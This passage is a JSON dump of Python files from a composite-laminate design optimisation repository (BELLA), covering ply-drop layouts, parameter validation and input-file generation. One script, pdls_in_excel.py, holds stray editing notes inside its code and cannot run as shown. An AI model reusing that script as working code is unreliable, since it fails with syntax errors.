has_middle_ply:\r\n ss_before = mother_ss_bot[\r\n mother_ss_bot.size - constraints.n_contig:]\r\n for ind in range(child_ss.size)[:: -1]:\r\n new_stack = np.hstack((\r\n ss_before,\r\n child_ss[ind],\r\n child_ss[ind],\r\n np.flip(ss_before, axis=0)))\r\n if not internal_contig2(new_stack, constraints):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n # symmetric laminate with middle ply\r\n elif constraints.sym and has_middle_ply:\r\n ss_before = mother_ss_bot[\r\n mother_ss_bot.size - constraints.n_contig:]\r\n for ind in range(child_ss.size)[:: -1]:\r\n new_stack = np.hstack((\r\n ss_before,\r\n child_ss[ind],\r\n np.flip(ss_before, axis=0)))\r\n if not internal_contig2(new_stack, constraints):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n else: # not symmetric\r\n ss_before = mother_ss_bot[\r\n mother_ss_bot.size - constraints.n_contig:]\r\n ss_after = mother_ss_top[:constraints.n_contig]\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not internal_contig2(\r\n new_stack=np.hstack((\r\n ss_before, child_ss[ind], ss_after)),\r\n constraints=constraints):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n\r\n return child_ss"
},
{
"alpha_fraction": 0.540989875793457,
"alphanum_fraction": 0.5549398064613342,
"avg_line_length": 30.30246925354004,
"blob_id": "9409abe144902330c3b31866ec74476555b8c903",
"content_id": "078f1147a0d46e38a8b95ad781d54b553ecc5668",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5233,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 162,
"path": "/src/BELLA/pdls_in_excel.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script generates input ply drop layouts\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pandas as pd\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.divide_panels import divide_panels\r\nfrom src.BELLA.pdl_ini import create_initial_pdls\r\nfrom src.divers.excel import autofit_column_widths\r\nfrom src.divers.excel import delete_file\r\nfrom src.divers.excel import append_df_to_excel\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA\r\nfrom src.BELLA.save_set_up import save_parameters_BELLA\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\n#from src.guidelines.one_stack import check_ply_drop_rules\r\n\r\n# Number of initial ply drops to be tested\r\nn_ini_ply_drops = 6\r\nfilename = 'pdls_ini_6_panels_5_boundaries.xlsx'\r\nfilename = 'pdls_ini_6_panels_9_boundaries.xlsx'\r\ndelete_file(filename)\r\n#==============================================================================\r\n# Targets and panel geometries\r\n#==============================================================================\r\n# panel number of plies\r\nn_plies = [60, 56, 52, 48, 44, 40]\r\n# number of panels\r\nn_panels = len(n_plies)\r\n# panel IDs\r\nID = list(range(1, n_panels + 1))\r\n# panels adjacency\r\n# panels adjacency\r\nneighbour_panels = {1:[2],\r\n 2:[1, 3],\r\n 3:[2, 4],\r\n 4:[3, 5],\r\n 5:[4, 6],\r\n 6:[5]}\r\nneighbour_panels = {1:[2, 3],\r\n 2:[1, 3, 4],\r\n 3:[2, 4, 1, 5],\r\n 4:[3, 5, 2, 6],\r\n 5:[3, 4, 6],\r\n 6:[5, 4]}\r\n#==============================================================================\r\n# Design guidelines\r\n#==============================================================================\r\n# symmetry\r\nsym = True\r\n\r\n# damage tolerance\r\ndam_tol = True\r\n\r\n# covering\r\ncovering = False\r\n\r\n# ply drop spacing\r\npdl_spacing = True\r\n# Minimum number of continuous plies required between two blocks of dropped\r\n# plies\r\nmin_drop = 5\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n dam_tol=dam_tol,\r\n covering=covering,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n\r\n\r\n********* to modify *********\r\n\r\nobj_func_param = ObjFunction(constraints)\r\n\r\n\r\n\r\n#==============================================================================\r\n# Optimiser Parameters\r\n#==============================================================================\r\n# Minimum ply count for ply groups during ply drop layout generation\r\ngroup_size_min = 8\r\n# Desired ply count for ply groups during ply drop layout generation\r\ngroup_size_max = 12\r\n\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\n# Time limit to create a group ply-drop layout\r\ntime_limit_group_pdl = 1\r\n# Time limit to create a ply-drop layout\r\ntime_limit_all_pdls = 100\r\n\r\n# DO NOT DELETE\r\nparameters = Parameters(\r\n constraints=constraints,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n n_ini_ply_drops=n_ini_ply_drops,\r\n coeff_spacing=coeff_spacing,\r\n time_limit_group_pdl=time_limit_group_pdl,\r\n time_limit_all_pdls=time_limit_all_pdls)\r\n\r\npanels = []\r\nfor ind_panel in range(n_panels):\r\n panels.append(Panel(\r\n ID=ID[ind_panel],\r\n n_plies=n_plies[ind_panel],\r\n neighbour_panels=neighbour_panels[ID[ind_panel]],\r\n constraints=constraints))\r\n#print(panels[0])\r\n\r\nmultipanel = MultiPanel(panels)\r\n#print(multipanel)\r\n\r\n#==============================================================================\r\n# Ply drop layouts generartion\r\n#==============================================================================\r\ndivide_panels(multipanel, parameters, constraints)\r\npdls = create_initial_pdls(multipanel, constraints, parameters, obj_func_param)\r\n\r\nsave_constraints_BELLA(filename, constraints)\r\nsave_parameters_BELLA(filename, parameters)\r\n\r\nfor ind_pdl, pdl in enumerate(pdls):\r\n table_pdl = pd.DataFrame()\r\n for ind_row, pdl_row in enumerate(pdl):\r\n for ind_elem, elem in enumerate(pdl_row):\r\n table_pdl.loc[ind_row, str(ind_elem)] = elem\r\n append_df_to_excel(\r\n filename, table_pdl, 'pdl' + str(ind_pdl+1), index=False, header=False)\r\nautofit_column_widths(filename)\r\n\r\n#==============================================================================\r\n# Save ply drop penalties\r\n#==============================================================================\r\ntable_penalties = pd.DataFrame()\r\nfor ind_pdl, pdl in enumerate(pdls):\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=pdl,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=True\r\n\r\n **are you sure?)\r\n\r\n table_penalties.loc[ind_pdl, 'penalty_spacing'] = penalty_spacing\r\n table_penalties.loc[ind_pdl, 'min_drop'] = constraints.min_drop\r\n\r\nappend_df_to_excel(\r\n filename, table_penalties, 'penalties', index=True, header=True)\r\nautofit_column_widths(filename)\r\n"
},
{
"alpha_fraction": 0.61297607421875,
"alphanum_fraction": 0.6263250708580017,
"avg_line_length": 37.18461608886719,
"blob_id": "8a9ceb7880a164ad54d72b8e6814d464dbda0298",
"content_id": "e3e46b1a9b2e94e1a032c2497e7d9fc2bde668fe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10188,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 260,
"path": "/src/BELLA/parameters.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for the parameters of the optimiser\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n\r\nclass Parameters():\r\n \" An object for storing the optimiser parameters \"\r\n\r\n def __init__(\r\n self,\r\n constraints,\r\n group_size_min=4,\r\n group_size_max=12,\r\n global_node_limit=100,\r\n local_node_limit=100,\r\n local_node_limit_final=1,\r\n global_node_limit_final=5,\r\n global_node_limit2=10,\r\n local_node_limit2=10,\r\n global_node_limit3=10,\r\n local_node_limit3=10,\r\n n_ini_ply_drops=5,\r\n p_A=100,\r\n n_D1=6,\r\n n_D2=10,\r\n n_D3=1,\r\n repair_membrane_switch=True,\r\n repair_flexural_switch=True,\r\n n_plies_ref_panel=1000,\r\n save_success_rate=False,\r\n time_limit_group_pdl=1,\r\n time_limit_all_pdls=100,\r\n save_buckling=False):\r\n \" Create a set of parameters for BELLA\"\r\n\r\n self.save_buckling = save_buckling\r\n\r\n ### BELLA step 2\r\n\r\n # size of the ply groups during BELLA step 2\r\n # desired group size for smaller groups\r\n self.group_size_min = np.around(group_size_min)\r\n if not isinstance(group_size_min, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, group_size_min must be an integer!\"\"\")\r\n if group_size_min < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, group_size_min must be strictly positive!\"\"\")\r\n # maximum group size\r\n if not isinstance(group_size_max, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, group_size_max must be an integer!\"\"\")\r\n self.group_size_max = group_size_max\r\n if group_size_min > group_size_max:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, group_size_min must smaller than group_size_max!\"\"\")\r\n\r\n # Time limit to create a group ply-drop layout\r\n self.time_limit_group_pdl = time_limit_group_pdl\r\n # Time limit to create a ply-drop layout\r\n self.time_limit_all_pdls = time_limit_all_pdls\r\n\r\n # Number of initial ply drops to be tested\r\n self.n_ini_ply_drops = np.around(n_ini_ply_drops)\r\n if not isinstance(n_ini_ply_drops, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, n_ini_ply_drops must be an integer!\"\"\")\r\n if n_ini_ply_drops < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, n_ini_ply_drops must be strictly positive!\"\"\")\r\n\r\n\r\n ### BELLA step 3\r\n\r\n # Branching limits for global pruning during BELLA step 3\r\n self.global_node_limit = np.around(global_node_limit)\r\n if not isinstance(global_node_limit, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit must be an integer!\"\"\")\r\n if global_node_limit < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit must be strictly positive!\"\"\")\r\n self.global_node_limit_final = np.around(global_node_limit_final)\r\n if not isinstance(global_node_limit_final, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit_final must be an integer!\"\"\")\r\n if global_node_limit_final < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit_final must be strictly positive!\"\"\")\r\n self.local_node_limit = np.around(local_node_limit)\r\n if not isinstance(local_node_limit, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit must be an integer!\"\"\")\r\n if local_node_limit < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit must be strictly positive!\"\"\")\r\n self.local_node_limit_final = np.around(\r\n local_node_limit_final)\r\n if not isinstance(local_node_limit_final, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit_final must be an integer!\"\"\")\r\n if local_node_limit_final < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit_final must be strictly positive!\"\"\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n ### BELLA step 4.1\r\n\r\n ### Thickness of the reference panels\r\n if isinstance(n_plies_ref_panel, (int, float)):\r\n self.n_plies_ref_panel = n_plies_ref_panel\r\n else:\r\n raise ParametersDefinitionError(\"\"\"\r\nThe ply count of the reference panels must be a number!\"\"\")\r\n\r\n # repair to improve the convergence of in-plane lamination parameters\r\n # and of out-of-plane lamination parameters\r\n self.repair_membrane_switch = repair_membrane_switch\r\n if not isinstance(repair_membrane_switch, bool):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, repair_membrane_switch should be a boolean value!\"\"\")\r\n self.repair_flexural_switch = repair_flexural_switch\r\n if not isinstance(repair_flexural_switch, bool):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, repair_flexural_switch should be a boolean value!\"\"\")\r\n\r\n self.save_success_rate = save_success_rate\r\n\r\n # coefficient for the proportion of the laminate thickness that can be\r\n # modified during the refinement for membrane properties in the repair\r\n # process\r\n self.p_A = p_A\r\n if not isinstance(p_A, (float, int)):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, p_A should have a numeric value!\"\"\")\r\n if not (0 <= p_A <= 100):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, p_A must be between 0 and 100!\"\"\")\r\n\r\n # n_D1: number of plies in the last permutation\r\n # during repair for disorientation and/or contiguity\r\n self.n_D1 = n_D1\r\n if not isinstance(n_D1, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, n_D1 must be an integer!\"\"\")\r\n\r\n # n_D2: number of ply shifts tested at each step of the\r\n # re-designing process during refinement of flexural properties\r\n self.n_D2 = n_D2\r\n if not isinstance(n_D2, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, n_D2 must be an integer!\"\"\")\r\n\r\n # n_D3: number of times the algorithms 1 and 2 are repeated during the\r\n # flexural property refinement\r\n self.n_D3 = n_D3\r\n if not isinstance(n_D3, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, n_D2 must be an integer!\"\"\")\r\n\r\n\r\n ### BELLA step 4.2\r\n\r\n # Branching limits for global pruning during BELLA step 4.2\r\n self.global_node_limit2 = np.around(global_node_limit2)\r\n if not isinstance(global_node_limit2, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit2 must be an integer!\"\"\")\r\n if global_node_limit2 < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit2 must be strictly positive!\"\"\")\r\n self.local_node_limit2 = np.around(local_node_limit2)\r\n if not isinstance(local_node_limit2, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit2 must be an integer!\"\"\")\r\n if local_node_limit2 < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit2 must be strictly positive!\"\"\")\r\n\r\n\r\n ### BELLA step 4.3\r\n\r\n # Branching limits for global pruning during BELLA step 4.3\r\n self.global_node_limit3 = np.around(global_node_limit3)\r\n if not isinstance(global_node_limit3, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit3 must be an integer!\"\"\")\r\n if global_node_limit3 < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit3 must be strictly positive!\"\"\")\r\n self.local_node_limit3 = np.around(local_node_limit3)\r\n if not isinstance(local_node_limit3, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit3 must be an integer!\"\"\")\r\n if local_node_limit3 < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit3 must be strictly positive!\"\"\")\r\n\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n return f\"\"\"\r\nParameters of BELLA step 2:\r\n Number of initial ply drops to be tested: {self.n_ini_ply_drops}\r\n Minimum size for the ply groups: {self.group_size_min}\r\n Maximum size for the ply groups: {self.group_size_max}\r\n Time limit to generate pdl at each group search: {self.time_limit_group_pdl}\r\n Time limit to generateall initial pdls: {self.time_limit_all_pdls}\r\n\r\nParameters of BELLA step 3:\r\n Branching limits during beam search:\r\n - for global pruning: {self.global_node_limit}\r\n - for local pruning: {self.local_node_limit}\r\n - for global pruning at the last level: {self.global_node_limit_final}\r\n - for local pruning at the last level: {self.local_node_limit_final}\r\n\r\nParameters of BELLA step 4.1:\r\n Input number of plies in reference panel: {self.n_plies_ref_panel}\r\n Repair for in-plane lamination parameter convergence: {self.repair_membrane_switch}\r\n Repair for out-of-plane lamination parameter convergence: {self.repair_flexural_switch}\r\n p_A: {self.p_A}%\r\n n_D1: {self.n_D1}\r\n n_D2: {self.n_D2}\r\n n_D3: {self.n_D3}\r\n\r\nParameters of BELLA step 4.2:\r\n Branching limits during beam search:\r\n - for global pruning: {self.global_node_limit2}\r\n - for local pruning: {self.local_node_limit2}\r\n\r\nParameters of BELLA step 4.3:\r\n Branching limits during beam search:\r\n - for global pruning: {self.global_node_limit3}\r\n - for local pruning: {self.local_node_limit3}\r\n\"\"\"\r\n\r\nclass ParametersDefinitionError(Exception):\r\n \"\"\" Error during parameter definition\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n from src.BELLA.constraints import Constraints\r\n constraints = Constraints(sym=True)\r\n constraints.bal = True\r\n constraints.oopo = True\r\n parameters = Parameters(\r\n constraints=constraints)\r\n print(parameters)\r\n"
},
{
"alpha_fraction": 0.5945913791656494,
"alphanum_fraction": 0.6461974382400513,
"avg_line_length": 32.01606369018555,
"blob_id": "0e246104102191087eca8616450a7cc0c93b5fe9",
"content_id": "d7f61db9bded921a5002a982de781cc53d97be0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8468,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 249,
"path": "/input-files/create_input_file_SST.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script creates the iput files used for testing BELLA\r\n\"\"\"\r\n\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA\r\nfrom src.BELLA.save_set_up import save_multipanel\r\nfrom src.BELLA.save_set_up import save_objective_function_BELLA\r\nfrom src.BELLA.save_set_up import save_materials\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\nfrom src.guidelines.one_stack import check_ply_drop_rules\r\nfrom src.divers.excel import delete_file, autofit_column_widths\r\n\r\nsheet = 'SST-40-60'\r\nsheet = 'SST-80-120'\r\nsheet = 'SST-120-180'\r\n\r\nfilename_input = '/BELLA/input-files/SST.xlsx'\r\nfilename_res = 'input_file_' + sheet + '.xlsx'\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename_res)\r\n\r\n# number of panels\r\nif sheet == 'SST-40-60': n_panels = 6\r\nelif sheet == 'SST-80-120': n_panels = 11\r\nelif sheet == 'SST-120-180': n_panels = 16\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n\r\n## lay-up rules\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\nset_of_angles = np.array([\r\n -45, 0, 45, 90, +30, -30, +60, -60, 15, -15, 75, -75], dtype=int)\r\n\r\nsym = True # symmetry rule\r\noopo = False # out-of-plane orthotropy requirements\r\n\r\nif constraints_set == 'C0':\r\n bal = False # balance rule\r\n rule_10_percent = False # 10% rule\r\n diso = False # disorientation rule\r\n contig = False # contiguity rule\r\n dam_tol = False # damage-tolerance rule\r\nelse:\r\n bal = True\r\n rule_10_percent = True\r\n diso = True\r\n contig = True\r\n dam_tol = True\r\n\r\nrule_10_Abdalla = True # 10% rule restricting LPs instead of ply percentages\r\npercent_Abdalla = 10 # percentage limit for the 10% rule applied on LPs\r\ncombine_45_135 = True # True if restriction on +-45 plies combined for 10% rule\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 =10 # percentage used in the 10% rule for +-45 deg plies\r\ndelta_angle = 45 # maximum angle difference for adjacent plies\r\nn_contig = 5 # maximum number of adjacent plies with the same fibre orientation\r\ndam_tol_rule = 1 # type of damage tolerance rule\r\n\r\n## ply-drop rules\r\n\r\ncovering = True # covering rule\r\nn_covering = 1 # number of plies ruled by covering rule at laminate surfaces\r\npdl_spacing = True # ply drop spacing rule\r\nmin_drop = 2 # Minimum number of continuous plies between ply drops\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficient for the contiguity constraint penalty\r\ncoeff_contig = 1\r\n# Coefficient for the disorientation constraint penalty\r\ncoeff_diso = 10\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\n# Lamination-parameter weightings in panel objective functions\r\n# (In practice these weightings can be different for each panel)\r\noptimisation_type = 'AD'\r\nif optimisation_type == 'A':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n else:\r\n lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])\r\nelif optimisation_type == 'D':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])\r\nelif optimisation_type == 'AD':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])\r\n\r\n\r\n# Weightings of the panels in the multi-panel objecive function\r\npanel_weightings = np.ones((n_panels,), float)\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\n# Elastic modulus in the fibre direction in Pa\r\nE11 = 20.5/1.45038e-10 # 141 GPa\r\n# Elastic modulus in the transverse direction in Pa\r\nE22 = 1.31/1.45038e-10 # 9.03 GPa\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.32\r\n# In-plane shear modulus in Pa\r\nG12 = 0.62/1.45038e-10 # 4.27 GPa\r\n# Density in g/m2\r\ndensity_area = 300.5\r\n# Ply thickness in m\r\nply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n\r\nmaterials = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\n# panel IDs\r\nif sheet == 'SST-40-60':\r\n # panel IDs\r\n ID = np.arange(1, 7)\r\n # number of plies in each panel\r\n n_plies_per_panel = np.arange(40, 61, 4)\r\nelif sheet == 'SST-80-120':\r\n # panel IDs\r\n ID = np.arange(1, 12)\r\n # number of plies in each panel\r\n n_plies_per_panel = np.arange(80, 121, 4)\r\nelif sheet == 'SST-120-180':\r\n # panel IDs\r\n ID = np.arange(1, 17)\r\n # number of plies in each panel\r\n n_plies_per_panel = np.arange(120, 181, 4)\r\n\r\n# panels adjacency\r\nneighbour_panels = dict()\r\nneighbour_panels[1] = [2]\r\nneighbour_panels[n_panels] = [n_panels - 1]\r\nfor i in range(2, n_panels):\r\n neighbour_panels[i] = [i - 1, i + 1]\r\n\r\nsst = pd.read_excel(filename_input, sheet_name=sheet).fillna(-1)\r\nsst = np.array(sst, int).T\r\nsst = np.hstack((sst, np.flip(sst, axis=1)))\r\nsst = sst[::2]\r\n\r\nss = convert_sst_to_ss(sst)\r\n\r\n# panel amination parameters targets\r\nlampam_targets = [calc_lampam(stack) for stack in ss]\r\n\r\npanels = []\r\nfor ind_panel in range(n_panels):\r\n panels.append(Panel(\r\n ID=ID[ind_panel],\r\n lampam_target=lampam_targets[ind_panel],\r\n lampam_weightings=lampam_weightings,\r\n n_plies=len(ss[ind_panel]),\r\n length_x=0,\r\n length_y=0,\r\n N_x=0,\r\n N_y=0,\r\n area=0,\r\n weighting=panel_weightings[ind_panel],\r\n neighbour_panels=neighbour_panels[ID[ind_panel]],\r\n constraints=constraints))\r\n\r\nmultipanel = MultiPanel(panels)\r\nmultipanel.filter_target_lampams(constraints, obj_func_param)\r\nmultipanel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n### Checks for feasibility of the multi-panel composite layout ----------------\r\n\r\ncheck_ply_drop_rules(sst, multipanel, constraints, reduced=False)\r\n\r\nfor stack in ss:\r\n check_lay_up_rules(stack, constraints)\r\n\r\n### Save data -----------------------------------------------------------------\r\n\r\nsave_multipanel(filename_res, multipanel, obj_func_param, calc_penalties=True,\r\n constraints=constraints, sst=sst)\r\nsave_constraints_BELLA(filename_res, constraints)\r\nsave_objective_function_BELLA(filename_res, obj_func_param)\r\nsave_materials(filename_res, materials)\r\nautofit_column_widths(filename_res)"
},
{
"alpha_fraction": 0.6246612668037415,
"alphanum_fraction": 0.6350497007369995,
"avg_line_length": 29.628570556640625,
"blob_id": "91817e1a55adfe6462cdbfc2adfb45b5553d5d1b",
"content_id": "f3530288a5b515b1adea76b3973353aa23e50a25",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2214,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 70,
"path": "/src/LAYLA_V02/ply_order.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to calculate the order in which plies are optimised\r\n\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\ndef calc_ply_order(constraints, targets):\r\n \"\"\"\r\n calulates the order in which plies are optimised\r\n\r\n OUTPUTS\r\n\r\n - ply_order: array of the ply indices sorted in the order in which plies\r\n are optimised (middle ply of symmetric laminates included)\r\n\r\n INPUTS\r\n\r\n - constraints: lay-up design guidelines\r\n - targets: target lamination parameters and ply counts\r\n \"\"\"\r\n if constraints.sym:\r\n ply_order = np.arange(targets.n_plies // 2 + targets.n_plies % 2)\r\n return ply_order\r\n\r\n order_before_sorting = np.arange(targets.n_plies)\r\n ply_order = np.zeros((targets.n_plies,), int)\r\n ply_order[0::2] = order_before_sorting[\r\n :targets.n_plies // 2 + targets.n_plies % 2]\r\n ply_order[1::2] = order_before_sorting[\r\n targets.n_plies // 2 + targets.n_plies % 2:][::-1]\r\n return ply_order\r\n\r\ndef calc_levels(ply_order, n_plies_in_groups, n_groups):\r\n \"\"\"\r\n calulates the indices of the plies for each ply group optimisation\r\n\r\n INPUTS\r\n\r\n - ply_order: array of the ply indices sorted in the order in which plies\r\n are optimised (middle ply of symmetric laminates included)\r\n - n_plies_in_groups: number of plies in each ply group\r\n - n_groups: number of ply groups\r\n \"\"\"\r\n levels_in_groups = [None]*n_groups\r\n for ind_group in range(n_groups):\r\n levels_in_groups[ind_group] = []\r\n\r\n ind_all_plies = 0\r\n for ind_group in range(n_groups):\r\n for ind_plies in range(n_plies_in_groups[ind_group]):\r\n levels_in_groups[ind_group].append(ply_order[ind_all_plies])\r\n ind_all_plies += 1\r\n\r\n return levels_in_groups\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n sys.path.append(r'C:\\BELLA_and_LAYLA')\r\n from src.LAYLA_V02.parameters import Parameters\r\n from src.LAYLA_V02.constraints import Constraints\r\n from src.LAYLA_V02.targets import Targets\r\n constraints = Constraints(sym=False)\r\n targets = Targets(n_plies=6)\r\n ply_order = calc_ply_order(constraints, targets)\r\n print(ply_order)\r\n"
},
{
"alpha_fraction": 0.5646512508392334,
"alphanum_fraction": 0.5718854665756226,
"avg_line_length": 35.090396881103516,
"blob_id": "d71641d499ee95dcdcb334a8a31d51e9352582a1",
"content_id": "a4b7142e55c938ec861124f75f77ecf0bd556d0f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13132,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 354,
"path": "/src/BELLA/pdl_ini.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
